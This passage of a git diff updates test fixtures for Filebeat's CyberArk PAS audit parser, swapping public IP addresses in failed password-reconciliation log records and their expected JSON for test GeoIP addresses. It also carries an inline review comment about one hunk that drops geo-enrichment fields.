the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 
2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} 
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json
index cac21295fdbb..2ad338b74850 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/60_cpm_reconcile_password_failed.log-expected.json
@@ -2,41 +2,42 @@ { "@timestamp": "2021-03-11T21:12:22.000Z", "cyberarkpas.audit.action": "CPM Reconcile Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615497142", "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask", "cyberarkpas.audit.ca_properties.retries_count": "0", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Reconcile Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-11T21:12:22Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Reconcile Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 11 13:12:22", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "cpm reconcile password failed", "event.category": [ "iam" @@ -54,7 +55,7 @@ "error", "user" ], - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", @@ -67,7 +68,7 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "34.66.114.180" + "81.2.69.143" ], "related.user": [ "ELASTIC\\bart", 
@@ -86,42 +87,43 @@ { "@timestamp": "2021-03-14T13:18:15.000Z", "cyberarkpas.audit.action": "CPM Reconcile Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615727895", "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask", "cyberarkpas.audit.ca_properties.retries_count": "2", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Reconcile Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "2", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:18:15Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Reconcile Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating 
System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 14 06:18:15", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "cpm reconcile password failed", "event.category": [ "iam" @@ -139,11 +141,11 @@ "error", "user" ], - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 3917, + "log.offset": 3901, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -152,7 +154,7 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "34.66.114.180" + "81.2.69.143" ], "related.user": [ "ELASTIC\\bart", 
@@ -197,11 +199,6 @@
 "cyberarkpas.audit.station": "10.0.1.20",
 "cyberarkpas.audit.timestamp": "Mar 14 06:46:13",
 "destination.address": "34.123.103.115",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "34.123.103.115",
 "event.action": "cpm reconcile password failed",
 "event.category": [
@@ -224,7 +221,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 7864,
+ "log.offset": 7832,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
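Review bot: The `@@ -197,11 +199,6 @@` hunk drops the `destination.geo.*` fields for `34.123.103.115` instead of replacing that address the way `34.66.114.180` and `35.192.121.42` are swapped for `81.2.69.143` and `67.43.156.12` elsewhere in this file, so the expected output now asserts an absence of enrichment rather than a known value; presumably the test GeoIP database simply has no entry for it. That same public address is still present unchanged in the corresponding `.log` fixture (the context records for `Operating System-UnixSSH-34.123.103.115-testark` just above this file header), so any later change to the test database would silently alter this expectation, and a live, routable cloud address remains in the test corpus. Consider replacing `34.123.103.115` with a third address from the same test-database range used for `81.2.69.143` (a `<TEST_DB_IP>` placeholder here, since none is named on the page) in both the log and the expected JSON, so the geo fields are asserted rather than omitted; the `@@ -224,7 +221,7 @@` hunk's `log.offset` values would then need regenerating as well.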
@@ -252,42 +249,43 @@ { "@timestamp": "2021-03-14T14:49:11.000Z", "cyberarkpas.audit.action": "CPM Reconcile Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615733350", "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask", "cyberarkpas.audit.ca_properties.retries_count": "3", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Reconcile Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "3", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-14T14:49:11Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Reconcile Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating 
System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 14 07:49:11", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "cpm reconcile password failed", "event.category": [ "iam" @@ -305,11 +303,11 @@ "error", "user" ], - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 11884, + "log.offset": 11852, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -318,7 +316,7 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "34.66.114.180" + "81.2.69.143" ], "related.user": [ "ELASTIC\\bart", 
@@ -337,42 +335,43 @@ { "@timestamp": "2021-03-15T10:12:18.000Z", "cyberarkpas.audit.action": "CPM Reconcile Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615803137", "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask", "cyberarkpas.audit.ca_properties.retries_count": "4", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Reconcile Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "4", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:12:18Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Reconcile Password Failed", - 